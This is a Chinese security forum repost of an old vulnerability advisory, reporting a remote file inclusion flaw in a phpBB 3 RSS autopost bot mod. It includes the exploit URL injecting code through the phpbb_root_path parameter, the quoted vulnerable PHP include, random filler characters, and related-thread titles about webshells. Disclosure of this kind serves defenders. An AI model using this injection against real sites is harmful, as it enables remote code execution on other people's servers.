最近看过此主题的会员

返回列表 发帖
phpBB 3 远程文件包含漏洞
phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include VulnerabilityVulnerability author: KacperGreetz: all DEVIL TEAM forum members.Author Website: http://devilteam.pl/                http://polskihacking.pl/Mod Description:This mod automatically post content from RSS feed into destination forum.MOD Download: http://phpbb3.smika.net/Demo: http://phpbb3.smika.netdont work when php5 or newest.Vulnerability:http://site.cz/forum_path/includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&amp;phpbb_root_path=[evil_code]------------------------------------------------------------------Bad codE:includes/functions_lastrss_autopost.php - line 204 - 240:
  1. if($config['lastrss_ap_enabled'])                                        <-----{1}{  // init &amp; setup lastrss  // $rss can be already initiated by lastRSS agregator mod by SmiX  if(!isset($rss))                                                       <-----{2}  {    require $phpbb_root_path . 'includes/class_lastrss.' . $phpEx;                                   <-----{3}    $rss = new lastrss;   }  // init/change settings for lastrss autopost bot  $rss->cache_time = 0;                                         // not used in this mod  $rss->items_limit = $config['lastrss_ap_items_limit'];        // default limit of items to post  $rss->type = $config['lastrss_type'];                         // connection type (fopen / curl)  // init lastRSS autopost MOD !  // check if we have some feeds in database to check  $sql = 'SELECT *      FROM ' . LASTRSS_AP_TABLE . '      WHERE next_check < "' . time() . '" AND enabled = "1"';  $result = $db->sql_query($sql);$row = $db->sql_fetchrow($result);$db->sql_freeresult($result);  // so do we have some feeds to post ?  if(sizeof($row) > 0)  {    // we are already sure, that at least one feed exists!    $feed = get_next_feed_to_post();   }  // do we have some feed data ?  if (isset($feed) &amp;&amp; (sizeof($feed) > 0))  {      // we are sure, we have feed info for checking the feed!    autopost_init($feed);  }}?>
复制代码
------------------------------------------------------------------Zapraszam na forum DEVIL TEAM, google:"DEVIL TEAM" lub http://6189.pl, http://devilteam.pl
( E! Z8 \# j# p( B( ^6 @+ \- N% G! J' J: V: Q
  q( _% e  h6 x+ U; v$ B

5 J; [- x9 g- o9 i2 D! h& Z( u3 ?( [% R# u+ o1 y9 a* T

& D8 y* i& y8 S3 g* G
! f/ v& ~( R& B; ]6 {* w, `) E6 l0 S
8 r. ~; C1 a2 z" _, w# t2 [" q  {- K6 w. W4 H

% c/ ]6 L' K5 Z  i  t& `; f
' G* ?6 t( o" F% s- c6 U) T9 H7 I9 Y  k) d" q8 Y
: E# @% F* u& ~4 E; r1 i, N" `

2 B* |% N8 j- q/ t/ P) E0 z
  {2 t6 w# y3 @! Z( W5 \% m: A: L( w' e5 h* _
( w9 }3 J( ?* K! \5 [: |
2 d+ g: c3 F) x8 N
8 ?" Y% A* |- L9 D$ Q# e/ A
公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

非安全中国网10周年T恤申请及相关事宜补充说明

非安全中国网10周年T恤申请及相关事宜通告

庆祝非安全中国网创办10周年纪念活动 t恤设计进度

罗斯论坛曝Gmail五百万密码泄露

整理网站0day

开放免费的DNS

好基友的一次完美信息追踪!

我的一份作业,基于BT平台的利用。初级教程。以前那个连接失效了。从新发下。

dz x3后台拿shell+webshell隐藏

基于各种原因,非安全中国网正进行秘密计划敬请期待

TOP

返回列表